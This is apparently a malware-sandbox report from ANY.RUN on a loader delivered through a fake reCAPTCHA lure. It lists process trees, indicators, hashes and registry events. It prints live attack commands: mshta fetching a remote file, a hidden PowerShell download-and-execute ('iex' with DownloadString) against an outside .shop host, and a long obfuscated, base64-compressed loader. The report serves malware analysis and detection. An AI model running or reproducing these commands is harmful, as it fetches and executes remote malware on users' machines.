File name:

command.txt

Full analysis: https://app.any.run/tasks/40d2f4e7-5d75-4a10-9ae9-212f479fe4b5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 16, 2025, 20:46:31
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
reflection
loader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5:

DC1DECA98B2A00423E1BB3A5E17E6C2B

SHA1:

D09794C2BDA7CF8819852E814876F43FDB16B8D6

SHA256:

ED090E0FC361CFE38BE60C1BBFA56DAC5093CBC8AE64D3B0C382CB3E6CD22336

SSDEEP:

3:I5DBKWAI0IR0K0O78VW8P5ACt+RbqRF4I1yMQRWL7n:I/5iTKr8fCC0IMPy7n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 1292)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1292)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 6076)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1292)
  • SUSPICIOUS

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 3288)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 1220)
      • powershell.exe (PID: 6076)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 1220)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 1220)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6076)
    • Probably download files using WebClient

      • powershell.exe (PID: 6076)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 6076)
    • Executes script without checking the security policy

      • powershell.exe (PID: 1292)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1292)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 6076)
  • INFO

    • Process checks computer location settings

      • SearchApp.exe (PID: 5064)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 3288)
    • Manual execution by a user

      • mshta.exe (PID: 2076)
      • mshta.exe (PID: 1220)
      • powershell.exe (PID: 3288)
    • Reads the machine GUID from the registry

      • SearchApp.exe (PID: 5064)
    • Checks proxy server information

      • mshta.exe (PID: 1220)
      • powershell.exe (PID: 1292)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3288)
    • Checks supported languages

      • SearchApp.exe (PID: 5064)
    • The process uses the downloaded file

      • powershell.exe (PID: 3288)
      • powershell.exe (PID: 6076)
      • mshta.exe (PID: 1220)
    • Reads the software policy settings

      • SearchApp.exe (PID: 5064)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 1220)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 6824)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1292)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
121
Monitored processes
10
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start notepad.exe no specs powershell.exe no specs conhost.exe no specs mshta.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs searchapp.exe

Process information

PID
CMD
Path
Indicators
Parent process
436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1220"C:\windows\system32\mshta.exe" https://dokedok.shop/ru1-2.mp3 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
1292"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://hhhh.klipcewucyu.shop/Handler.db'))" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2076"C:\WINDOWS\system32\mshta.exe" C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
2976\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3288"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5064"C:\WINDOWS\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mcaC:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Search application
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\microsoft.windows.search_cw5n1h2txyewy\searchapp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5308\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc $ C C w f r g M J 5 7 8 B v n i b 1 D M 6 C h 9 q n S i E y w 8 u Y I 0 h h r F p o O O Y 0 J r A w 6 C z W U y s L t N h U O Q G v H L a j C H a E y d i t b Z A 7 0 D z c S 6 a 6 b j y 5 p O M m e 3 X 8 F N A X e B p p E D 4 v 1 r k s N v s C A W b L 6 O A n K n Z c B Q Z Q m R t L g G R m 5 D n G 7 Q 3 U 3 v e 4 Q Q J V X U J Z O C i G N T H W B p z q J Q 7 B e L Q G v C 1 7 o z 9 2 J I P H H n r J l B f p A X E h I t H O Q Y i B q 9 P T 0 Y X l D 0 Y i I H d c G K 4 5 3 v Z L t h C W q j H M 9 j f 9 s 3 6 J Y 9 v D i 0 i W C u 5 y 1 P 4 E w u B H G C J W A J y j 8 z n 2 E D 1 y 3 t K c r y K c a v u E O Z P h P T O 0 T T I x 0 W R J G h Z n X h C O L T c U W 0 D P E f 0 G 7 2 e n o j W C J v H 4 x w 6 D T K 2 C C h T X C T x 5 x i W u G 1 R v c P d W i t J s T J z k y m k I D F 6 X K 0 S T Z x A 9 8 1 K s 6 I t I c k g Z n L H a c 7 D U m M j Y H 3 t 5 v R s D 4 a 3 e P g 7 J X O H N L 1 y 4 e o t y p i h K m g l S k a s b z j T j 4 f 3 n 7 s X y 0 T V k 2 a D l 2 5 m 1 S J 0 e p j J S 6 u 5 m W v 1 B h V H i 3 z X 7 4 g s 7 z 6 7 I 7 z k r m R W L p J 3 K r w 8 I P 0 5 i 0 9 y T j p o h b O F g j k 0 7 7 J J A h h 8 c U T A t 2 T E C V F z O M Z O M 4 Y W q 1 f A h e a e W J u j R S 5 l H K a 8 3 B h B A X f g 3 g H f L 3 V t b L G B P 6 k l 3 C p 4 Y S H C q R r y o s z 4 3 S i R 6 s Q a L 7 f v O t T V L Q 5   =   $ f A L s E  
 $ B f j 5 V Y u V 9 T 2 U C r O J Y q u g b o O M r s b j P 8 N 3 I n 1 v 1 i I 2 e V 0 D C o 8 A 7 e j b G 2 c d E y S o 8 I 2 6 y g 0 x 1 2 K t Q l r A i i u L a i 6 C L S O P n Q c g k u f S o L c 6 P P Y t d D 2 D a b 8 i D s q l Q D V i Z V Y o c S L C 7 Q N l 8 U I i l 2 k M W y k F 8 p E 8 P F Q o z Z X E H 9 Y M L P T B A g 4 5 B u 7 g l k l B G Z 0 p G p l X o 3 S f y f y X M M W d i q D e 6 Z 0 e n r S d f I M s F Z G o I U G r C B 0 d L m 9 G x B C V w h n O d y C 6 2 V H S J n O 1 g 1 8 l s u p b o K P V 0 A x V R 6 8 X G y X A m h X C Z h U g n 5 z U R p 9 q i g I j H t 2 r l C B h J G W n F 9 O 2 P q x 8 j T o C v J j M c Y r 9 K g 7 W w 1 V v p w r x J x h V F l k e m o 2 F i f w y O j 0 X 5 1 o R f M Y P X 5 H d i F 3 X v u D g Y l K g F Z Y h V 5 n 2 d b L e w E F k M x 4 V h q Z m f B p L Y D N 7 d J A B i f w O l G D g k R K Y K 3 p G N N d 8 j 7 E U 8 o E 9 f R T C H 9 Z 9 b Z P E 9 b S N 7 C A O J o z r d C k K z h y T f M m o 4 D R J Q R v Q C k g P i 4 K T D f N 3 1 l C R A g I N 6 9 I F m 9 W G H y K j o r t 3 t h w Z p 2 H I i L j e x j f w d X 3 B R n M Y 7 K I f   =   $ T r u E  
 $ o n F k z 4 J Y 4 F w B X 6 u d I x M 7 p L s b 1 S N Z b s v k h N Z K z O B v i U v D O H b H O O o E n T 5 z V S H X h 4 o B B o n v 3 9 l f n l V G L 0 Y 7 Y r A u r 7 7 H w N p i N 2 V e M n n X 6 w Q 8 X Y 9 0 k 0 Q X i t L Q S W S q u t a u 6 y p T N 3 y x 5 V P   =   $ N u l l  
 $ I L s x q t 9 p H 5 c m Y z 9 O e 1 A P m 5 W e w o X c e g 1 k l U p i 1 O i H P Q d N F C Z K H U s r I R N X G T a e d i P j V k x q y 3 l L s d 6 e s B k U U D T i J O a 2 s Z J k a l 1 W S h m H W f Q h 7 Z u P d r P 4 M H h v Q h a 9 y V 6 Z T y S 3 3 U A N 4 I 1 1 O 4 f N C i M c r 6 N 5 t Q r 3 R u 3 Q M G n 3 e V P t I Z 4 K 2 2 c W b 9 M L f E O r s U G I g v G N 1 M O C 0 l Q 3 f 9 o b O b R E p 9 P Z I 4 i s F I I g c v E X 8 7 0 A v P s 6 L L i O y R u M l M Q C 1 n L 5 W J Y C I Y Q N s Z 9 4 X I x K 6 7 K f g q L I 7 2 z X y 5 7 v 3 d d F g F o g o c T Q W B K i b c T L y M K K b 0 P k x q 7 n H l k I E h g e N 1 y f x r 3 t N Z X F 4 p s d 6 N X v m r 2 Q 2 s v N i c 6 F t 0 O t p M w w V v z k f u X O 4 P 1 O v j V J 0 J M i v h G J I 3 j V X F b V 4 l x O k o N k U 9 O 7 i U y h 3 i r A s s G I l o n 4 i g d b W r s 9 D C B R 7 z M D p v t c 1 6 v 4 w 4 1 i D S C 2 k Q Y 7 S S c 4 Y O e y P w R E N h o Z 8 1 c O O L t 5 6 E A E c 9 K 2 I g a H y 3 i K D W r A i v 9 s i p e l 0 b 5 n n d R g D V 6 I H C 7 s t r X M B i d o h z k y j E J s J W p r 8 q t A c e L 6 C L n u t S   = " D e f l a "   +   " t e S t r e a m " ; $ j g T w R 2 n x C 7 Y V 7 M u f 4 f g N A u u D z 1 H 2 w z n i q D p m R o G 4 X y d b p A U J C D y q B r x c 6 u v a m 6 I M Q b Q B a Z z g W b q e R F K H I y 3 n X O X l g 1 e v S X T N P P 7 Y S e L M Y 0 f 7 b n 6 f f w I U e 1 F v D o Z K O R j Q V H W 5 l u V M H a V 0 l P x 4 E O b 7 x 4 E K Z k y T P y W F V i X M F d E B n C G 5 q A b n l U C Y 8 1 k o w H U k B 1 g z b 0 F m 3 6 N X c 7 W i R Q I b G 8 f W y 4 6 s Y u O F A d E e c K b k T b s F X v S P z X m 0 R l m 9 S q 0 s g 4 D p O D z I l 5 v w 1 r V u Y S 3 d 0 Y b h C B s f W N J T o u B i R G j R c 8 R y u 2 X l f o D f 0 K o U V R O x x D v K 4 H 7 3 E P t 4 l s 0 U T m r F 7 b x 1 p q j X R C l e O a V o H N c 8 L u X Y z D 6 7 k 9 Y 7 Z Z r 9 M M 0 u s 4 P 3 p T 3 y X a 0 R f 9 M 6 e j r o e 3 K 9 1 A v r l N x s h n J A N X J J p J f 2   =   " C o m p r e "   +   " s s i o n " ;   $ 3 G m X q d h c r u I T P 0 9 1 d Z B y W 6 8 6 L v D u X 1 k N 3 m I t R i 0 8 N H n V 5 Q T 1 t h T P F l z v Y M P Z V S y I N B a P v a K r g A f 5 L Y O 1 Y q B u c m p G y 0 m k c f L N v K b t d w 2 e M F y 6 K a G 5 h q z V Y S n t N N h c x o 4 0 J M 4 e E x L P f O G Y C B k 9 O T m 7 u L d d I r U I 7 7 J r B B 5 d y C g 7 P U W 5 T Y V k J m E 5 v k W 1 1 E s r I r a U I 6 Y Q M K E 6 O M O c y X R v U J 5 i j B o X e p G t f 6 D X D L Z E n c I K g c X l u M n e O F C r C L Y N N P R G s w C t Z L A p e v I F 4 i W P Y Y Y C l 0 D w Y O 4 f I b U 5 D S L v 4 2 Z f n u i N 1 W N f f a 7 w v K 0 I 3 z C D Q z k M y 6 F e F 5 7 7 F 0 E o 1 F 0 W Q 2 v J I M k q s u 8 W b 3 X Q r o y M C l Q 5 p u r N V 1 8 G Q x H 7 u n D n x U z t r 8 F c f n c B r W 3 i b l G i S M U A S v T 2 T C h 1 A l 1 M R 9 6 l C 0 K L x 0 K Y U j 8 T l I D L P J c J Z j Y F d t v G H 7 W G w R J Y J 6 Q x 8 N A T 4 j u p a u I Q 9 J Y n 5 h s Y y u Y U 6 e k X K D 9 R j g o J P y R t 8 X 9 0 v U D L l 2 v j n M g L h 8 h D f L d D Z m x Z j D Z w a L w J v L K k P M q t 2   = " S t r e a "   +   " m R e a d e r " ;   . ( " i " + " e x " )   $ ( N e w - O b j e c t   I O . $ 3 G m X q d h c r U i T p 0 9 1 D Z B Y w 6 8 6 l v D U X 1 k N 3 M I t r I 0 8 n h n v 5 q T 1 T h t P f L Z V y M P Z v S y i N B A P v A K r G a f 5 l y O 1 Y q B U C M P G Y 0 M k C F L n V k b T d W 2 e M f Y 6 k a g 5 H q z V Y S n T n n h C x o 4 0 j M 4 E E X l P f O G Y c B k 9 O t M 7 u l d D i R U I 7 7 j r b b 5 D Y c G 7 p u w 5 T y v K j m E 5 v K w 1 1 E S r I R a U i 6 Y Q m k E 6 O m o c Y X r v u J 5 i j b o x E p G t F 6 D X d l z e n C I k g C x L u M n e o F c R C L Y N n p r G S W c T Z l A p E V i f 4 i w P y y y C L 0 D w y O 4 F I b U 5 D S l V 4 2 Z F n U i N 1 W n f f a 7 w V K 0 I 3 Z c D q Z k m Y 6 F E f 5 7 7 f 0 e O 1 f 0 w q 2 v j I M K Q S u 8 w b 3 x q R o Y M c l q 5 P u R n v 1 8 G q x H 7 u N D N x u Z T R 8 f C f n C B r W 3 I B L G I S m u A S v T 2 T c H 1 a l 1 M R 9 6 L c 0 K l X 0 K Y U j 8 T L i D L p J c J z j y f D T V G h 7 W G W r J y j 6 Q x 8 n a T 4 J u P A U I q 9 j Y n 5 H s Y y u Y U 6 e K x K d 9 R J g o J P y R t 8 x 9 0 V U D L L 2 v J N M g l H 8 H d F l D D Z m x Z j d z w A L W J v l k K P m Q T 2   ( $ ( N e w - O b j e c t   i o . $ j G T w r 2 n x C 7 Y V 7 m u f 4 F g N a U U d z 1 H 2 W Z n i q D p m r O G 4 x Y D B P A U j c D Y Q B r x C 6 u V a m 6 I m q B q B a z Z G W b q e R F k H i y 3 n X o x L G 1 E v S X t n p P 7 y s E L M Y 0 F 7 B N 6 f f W i U e 1 F V d O z K o R j q v h w 5 l U v m H A V 0 L p x 4 E o b 7 x 4 E K Z K y t P Y w F V i x M F D E b N C g 5 Q A b N l U c y 8 1 k o w H U K b 1 g z b 0 f m 3 6 N X C 7 w I r q i B G 8 f W Y 4 6 s Y U o F A d E E C k B K T B S f X V S p z X m 0 r L M 9 S Q 0 S G 4 D P O D Z i L 5 v w 1 R v U Y s 3 D 0 Y b h c B S F W n J T O U b I r g j r C 8 r y u 2 X l f O D F 0 k O U v r O x X d v K 4 h 7 3 E p t 4 L s 0 u T M R F 7 B x 1 P q J x R C l E o A V o H N c 8 l U x y Z D 6 7 k 9 y 7 z z r 9 M M 0 u S 4 p 3 p t 3 Y x A 0 r F 9 M 6 e J R o E 3 k 9 1 a v r L n X S H n J a n x j J p J F 2 . $ i L S x Q T 9 P h 5 c M Y z 9 O E 1 A p m 5 w E W O X C e g 1 K l U P I 1 O i H P q D n F c Z k h u s r i r N x g t a E d I p j v k X Q y 3 l l S d 6 e S b K U u D t I J O A 2 S Z j K a l 1 w s H M h w f q H 7 Z u p d r P 4 M h H v Q H A 9 y v 6 Z t y s 3 3 u A n 4 I 1 1 O 4 F N c I m C r 6 n 5 t q R 3 R U 3 Q M G N 3 e v P T I z 4 K 2 2 C W b 9 m L F e o r s U G I g V G N 1 m O c 0 l Q 3 F 9 O b O B R E p 9 P Z i 4 I S F I I g c v E X 8 7 0 a v P s 6 L l I O Y R U m l m q c 1 n l 5 w J y c i Y Q n s Z 9 4 x I X K 6 7 K F G Q L i 7 2 Z x Y 5 7 V 3 D D f G F o G O c T q W b k I b c T L y m K K b 0 P K x Q 7 N h L k I E h g E N 1 Y F x r 3 t n Z x f 4 P s d 6 N X v M r 2 Q 2 S v N i C 6 f t 0 o t p M w w v V Z k F u x O 4 p 1 O v J V J 0 J m I V H g J i 3 J v x f B V 4 l x o K o N k u 9 o 7 i u y h 3 I r a S s G I L O n 4 i g d b W R s 9 d c b R 7 Z M d p V T C 1 6 v 4 W 4 1 I d s C 2 k Q y 7 s S C 4 Y o E Y p W r e n h O z 8 1 c o O L t 5 6 e A E C 9 K 2 i g a H y 3 I k d W R a i V 9 s i P E l 0 B 5 n n D R g d v 6 I h c 7 S T r X m b I D O h Z K y j E J s j w p r 8 Q t A c e l 6 C L n u t s   ( $ ( N e w - O b j e c t   i o . m e M o R y s t R E A m ( , $ ( [ C o n v e r t ] : : ( " F r o m B "   + " a s e 6 "   +   " 4 S t r i n g " ) ( " N Y 8 x b 8 I w F I T / y p M X k s F O k V A H t i o M D B U g e c i S g S R + w g b H t u w X T P 5 9 T a v e d j d 8 d y d p i M Q v 0 U + Y E r B 2 3 3 f G K Z 9 T L 9 f U + f y 5 + w 8 u P m O U G q 3 t n 1 v x 0 Y e 3 T 2 8 v 8 I U M + F e 8 L T M 6 + j a J g P E M 2 i i F D j g G G N c w F D 5 3 P g B v / T w P T s G V G X x B V Z 0 w 8 / N 4 x 4 m g l B L O 4 o Q k O h x b a w q v F g e f n f W D k h S N u 1 U b T R T S v m l 0 k X h Y E y b M y 7 Q u I m k f m m N h W 4 x C j Z u 6 v r K y 7 O + B p N U i H H 9 H / Q A = " ) ) ) ) ,   [ I o . C O m P r E s S i o N . c O m p r e S S i o N m O D E ] : : ( " D e "   + " c o m p r e s s " ) ) ) ,   [ T E x t . e N c O D I N g ] : : A S C I I ) ) . R e a d T o E n d ( ) ; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
6824"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\command.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
Total events
24 440
Read events
24 284
Write events
152
Delete events
4

Modification events

(PID) Process:(5064) SearchApp.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\A1hdl50UVDh2ZbG324Nx-6fZgntcGnHOs5kHLdmaJYE\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech_OneCore\Recognizers
Operation:writeName:DefaultTokenId
Value:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech_OneCore\Recognizers\Tokens\MS-1033-110-WINMO-DNN
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:IsMSACloudSearchEnabled
Value:
0
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:IsAADCloudSearchEnabled
Value:
0
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:writeName:CortanaStateLastRun
Value:
6E70896700000000
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting
Operation:delete valueName:CachedFeatureString
Value:
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:SafeSearchMode
Value:
1
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting
Operation:writeName:CachedFeatureString
Value:
(PID) Process:(5064) SearchApp.exeKey:\REGISTRY\A\{ee080948-b2ea-145a-6870-f9164b908eb9}\LocalState
Operation:writeName:BINGIDENTITY_PROP_USEREMAIL
Value:
00004EE071E35768DB01
(PID) Process:(5064) SearchApp.exeKey:\REGISTRY\A\{ee080948-b2ea-145a-6870-f9164b908eb9}\LocalState
Operation:writeName:BINGIDENTITY_PROP_ACCOUNTTYPETEXT
Value:
00004EE071E35768DB01
(PID) Process:(5064) SearchApp.exeKey:\REGISTRY\A\{ee080948-b2ea-145a-6870-f9164b908eb9}\LocalState
Operation:writeName:BINGIDENTITY_PROP_ACCOUNTTYPE
Value:
00004EE071E35768DB01
Executable files
0
Suspicious files
68
Text files
121
Unknown types
0

Dropped files

PID
Process
Filename
Type
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\wU-YmSK-j9YaNg2gj_x4wAl_UoI[1].csstext
MD5:C1AC4CCA38EA836717738D7CF72B45B9
SHA256:E4C0BF089E674482FA2FE7D558F64F9D3EBDD414EAED18908E34A6140D09B727
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].csstext
MD5:77373397A17BD1987DFCA2E68D022ECF
SHA256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbresbinary
MD5:4BB4BAA6886E3FA9F8EEB171AEFF8807
SHA256:4FBD74931A70B823AFBABC318F51165EA8A03F431FCFA8861366DFE3EB91AF67
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\fvNdnrKxhhxDQUEi09cCaSWpzzE[1].csstext
MD5:15DC838A1A66277F9F4D915124DFFBBC
SHA256:9C947D5F732431197DA9DB1F159CB3D4CDC5DBFE55FDC0A9513E571FF31236A1
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\vOJNaIfAXvJzmnBm845ss-M9YR8[1].csstext
MD5:87BBB1A289EDC24C9F06B88229765467
SHA256:85B291C46F9D1EEEC71DB839F649D748F48B203EA836F3ACE3B9B761947D960C
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\4BpQ1bD8vX1mXuJObN-gg9RqkyQ.br[1].jsbinary
MD5:8465A334065673EB6A6487C8D87539DB
SHA256:84ED6C495B322B0F2213CC33EC6C652D84D82E010C928B1141DB2290D4365F3D
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\FaKDzaPMZdBV7yhr3MlL0gPWj9c.br[1].jsbinary
MD5:3ECF3970D63EB9E038DED8284DDD2B24
SHA256:C168C86934DD2699CE5F1EE1459AE23699A5B536B15F7CCD4CC1908D30F7D1A0
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\AptopUBu7_oVDubJxwvaIprW-lI[1].csstext
MD5:4E0E75684C84C0102CED12948B95609B
SHA256:4D18E491B2DE4DA34F6C15F0574911613E902F791FE72501E4404802760D1BCA
